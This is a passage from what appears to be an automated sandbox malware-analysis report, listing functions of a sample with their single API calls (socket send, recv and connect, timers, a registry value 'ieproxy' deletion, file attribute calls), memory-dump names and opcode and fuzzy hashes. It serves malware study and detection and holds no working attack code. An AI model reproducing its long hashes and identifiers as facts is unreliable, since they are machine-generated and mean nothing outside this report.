                                                                                                                                                                      • GdipBitmapLockBits.GDIPLUS(?,?,?,?,?), ref: 001AB440
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BitmapBitsGdipLock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2574020740-0
                                                                                                                                                                      • Opcode ID: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
                                                                                                                                                                      • Instruction ID: 13f6f7e4f08c45f6691bf27b073902d788c98a12881917c9f44d27b4cfa2d4a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 78855c32984809d62a231fe8d2a6a77fe25221922e89fb3875c21b092380d81e
                                                                                                                                                                      • Instruction Fuzzy Hash: C1D05E3600C602AE8B219E61EE0180BBEE2EF48700F004C19B88660526D321DC24EB33
                                                                                                                                                                      Function 5F51FE29 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: send
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2809346765-0
                                                                                                                                                                      • Opcode ID: 1fbd99af1ec0db6d2f487072acb9854f3c011695807539078681547f498ac065
                                                                                                                                                                      • Instruction ID: 6b3470496d93af03efc851e11d8d86e8d43d5a77fef71233949dd91726d3f2aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fbd99af1ec0db6d2f487072acb9854f3c011695807539078681547f498ac065
                                                                                                                                                                      • Instruction Fuzzy Hash: 3FD01772000608EFCB018F84C848EA57BA5FB08324F648098F60D0A532C333E8B2DF80
                                                                                                                                                                      Function 5F51C5B6 Relevance: 1.5, APIs: 1, Instructions: 15timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTimer.USER32(?,00000000,00000064,00000000), ref: 5F51C5D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Timer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2870079774-0
                                                                                                                                                                      • Opcode ID: add73cb03af044053a12e72c840923d8808ca908c21025960be5b71ce588d93a
                                                                                                                                                                      • Instruction ID: 1c14931a57173b82df474df22c7cd40597bebc65750555d0e2220ab0239916f1
                                                                                                                                                                      • Opcode Fuzzy Hash: add73cb03af044053a12e72c840923d8808ca908c21025960be5b71ce588d93a
                                                                                                                                                                      • Instruction Fuzzy Hash: D4D0C9B1A52200ABF7109B288D99F5937E5E708765F720869F224DA5E1D762A8A48608
                                                                                                                                                                      Function 5F51FC9E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: recv
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1507349165-0
                                                                                                                                                                      • Opcode ID: 4fcef22a307e62568974499a27ed1cb9c30e986c0767360783a71fab0722abed
                                                                                                                                                                      • Instruction ID: 8f53e3582a1450f2f10cf53663ce52f8e4eaa1c757a24fee7bcde662435e6455
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fcef22a307e62568974499a27ed1cb9c30e986c0767360783a71fab0722abed
                                                                                                                                                                      • Instruction Fuzzy Hash: 9CD06776144608EFCB019F84D944EA57BA5FB08329F6480ADFA1C0A562C733E872EF90
                                                                                                                                                                      Function 5F51FE51 Relevance: 1.5, APIs: 1, Instructions: 14networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • connect.WS2_32(?,00000000,00000000), ref: 5F51FE6A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: connect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1959786783-0
                                                                                                                                                                      • Opcode ID: 926187ac5a768dfc7ba6eef1fa979f73ea246c7965efa778360cda5d03b9ceea
                                                                                                                                                                      • Instruction ID: 225c2565de0317295ab547d83267ca8c475e89a507779f36d0975a0d64f44597
                                                                                                                                                                      • Opcode Fuzzy Hash: 926187ac5a768dfc7ba6eef1fa979f73ea246c7965efa778360cda5d03b9ceea
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CD0627A204101DFC7055B54C5549997BA1BF5D325F24469DF15D8A1B2C732D8A6DF00
                                                                                                                                                                      Function 5F516CFE Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegDeleteValueW.KERNEL32(?,00000000,5F4F5DF0,ieproxy), ref: 5F516D11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1108222502-0
                                                                                                                                                                      • Opcode ID: dd2d9777b24a0c6f347c5d23e6f62a53430ae409872a38b2b319c8941bbe2dc0
                                                                                                                                                                      • Instruction ID: 8dc6fe8510e0b5bf1a6ba96ec8a46e262f53999b5ae6d5a155c6855689396808
                                                                                                                                                                      • Opcode Fuzzy Hash: dd2d9777b24a0c6f347c5d23e6f62a53430ae409872a38b2b319c8941bbe2dc0
                                                                                                                                                                      • Instruction Fuzzy Hash: 66D012B1754209ABEB005A34CA08F66BBE9EB55706F10CD3DB08AC3091D771F429D621
                                                                                                                                                                      Function 0017DEB6 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0017DEBA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 5942e883f49f3cf63ffb1797ec0f125b230331d813c8c6ff96fc29deabed8677
                                                                                                                                                                      • Instruction ID: a7622c836458591e9fb3817f71ac585fad36e6de1c130462f8a8a4d9db52e083
                                                                                                                                                                      • Opcode Fuzzy Hash: 5942e883f49f3cf63ffb1797ec0f125b230331d813c8c6ff96fc29deabed8677
                                                                                                                                                                      • Instruction Fuzzy Hash: 51C08C32221005074E401634AD060A633E2DA62B31FA08F94F0A5C70E1CF20880A2A00
                                                                                                                                                                      Function 001D6B56 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNEL32(00000002,00198D5A,00000000,?,001D6919,FFFFFEE2,00000002,?,00000000,00000000,00000748,001D6A2D,?,00000000,00000000), ref: 001D6B71
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 359eb2d934473a5a692026cc4f5dc6801889693d6b378392d1d50beaeebd494c
                                                                                                                                                                      • Instruction ID: db47f4cbbfc79bd7db9ea1b2a4d01ec2014d4b0d13ff9abd25c63c306206a462
                                                                                                                                                                      • Opcode Fuzzy Hash: 359eb2d934473a5a692026cc4f5dc6801889693d6b378392d1d50beaeebd494c
                                                                                                                                                                      • Instruction Fuzzy Hash: D8C01231208700BADE111BA09D05F6ABE61BBA0724F22CA17B5A8D41F0DB72C821EB01
                                                                                                                                                                      Function 5F51FF58 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • setsockopt.WS2_32(?,00000000,00000000,00000000,00000000), ref: 5F51FF6B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: setsockopt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3981526788-0
                                                                                                                                                                      • Opcode ID: 7f9a141d265e18b9c4a585a7a5e599796d3be3d0ec573dc3838595ade4a2bead
                                                                                                                                                                      • Instruction ID: defe2600084285e1c07b4cd5912418ba8bde4f23340c48e6fcd97add7688c9f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f9a141d265e18b9c4a585a7a5e599796d3be3d0ec573dc3838595ade4a2bead
                                                                                                                                                                      • Instruction Fuzzy Hash: 21D0E93B114101BFCB064B648D5584EBBA6AF89731F14CA1DF1BA850A1D732C475FB01
                                                                                                                                                                      Function 5F4EAF8A Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(000000FF,5F4FFE4F,?,00000001,00000000,00000000,00000000,000000FF,00000001,5F5BC288,00000000), ref: 5F4EAF8E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: d66c44f1dfe108996bcbe3306bfa83bd6934beff05c9bd1674fdad39509e1524
                                                                                                                                                                      • Instruction ID: f7b34d5c8b9b6fe109248e27ab433b958f140813774b6d00e74e1afb4bbd8fe5
                                                                                                                                                                      • Opcode Fuzzy Hash: d66c44f1dfe108996bcbe3306bfa83bd6934beff05c9bd1674fdad39509e1524
                                                                                                                                                                      • Instruction Fuzzy Hash: 32C09BF151150059DB041734CD054D977919B8113BF511F64F5FBD11E5F73098577505
                                                                                                                                                                      Function 5F4DD55B Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 176396367-0
                                                                                                                                                                      • Opcode ID: 194c73b0549b6e96b3488b5d9baabecc9fefa26f4ada6e88ffcff381e67bc41f
                                                                                                                                                                      • Instruction ID: 98ffd5aeb5739e6312efa5cebdb12c32113424aa7816548110db1befb7127e6f
                                                                                                                                                                      • Opcode Fuzzy Hash: 194c73b0549b6e96b3488b5d9baabecc9fefa26f4ada6e88ffcff381e67bc41f
                                                                                                                                                                      • Instruction Fuzzy Hash: 53C08CB20063202A462512609C1086FAE55CF90130B01881FBC44012A099369CD1C0D1
                                                                                                                                                                      Function 001EAD5E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                      • Instruction ID: 1140de0742ddde2c8e119d5a11fe3d5d30702701da57c9ff614d30587d56cb11
                                                                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                      • Instruction Fuzzy Hash: 64C09B7244014C77CF111D43DC02E493F199BD0760F544010FB1C1E161E673E5619685
                                                                                                                                                                      Function 00183D10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 00183D18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 752e94e4e9ce08bf8ce78c9ce9817768532e67bee415eff97e7126206aeeaba3
                                                                                                                                                                      • Instruction ID: 9f7cb08ecf0300e24446d3c704be1bc3c3638f1ef9f496eeebcce881965b4169
                                                                                                                                                                      • Opcode Fuzzy Hash: 752e94e4e9ce08bf8ce78c9ce9817768532e67bee415eff97e7126206aeeaba3
                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC00236440148BBDF425F90EC09E9D7F22BB64750F04C015FA5808171DB3286B5EB40
                                                                                                                                                                      Function 00183CA8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __read
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1330306528-0
                                                                                                                                                                      • Opcode ID: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
                                                                                                                                                                      • Instruction ID: 210745b5a94d769c8c1335b3e1fef0cb28bb98c600da4545ce4019fd9744ce90
                                                                                                                                                                      • Opcode Fuzzy Hash: 627988362cf98099db0abecbe1b77d65a3d091794f3f46832c121beea6ab4c39
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC08C3A809240BFC7034750BC01A4EBBB1ABA2310F04C81AB8D801032EA324178E753
                                                                                                                                                                      Function 5F51FEC7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ioctlsocket.WS2_32(?,?,?), ref: 5F51FED2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
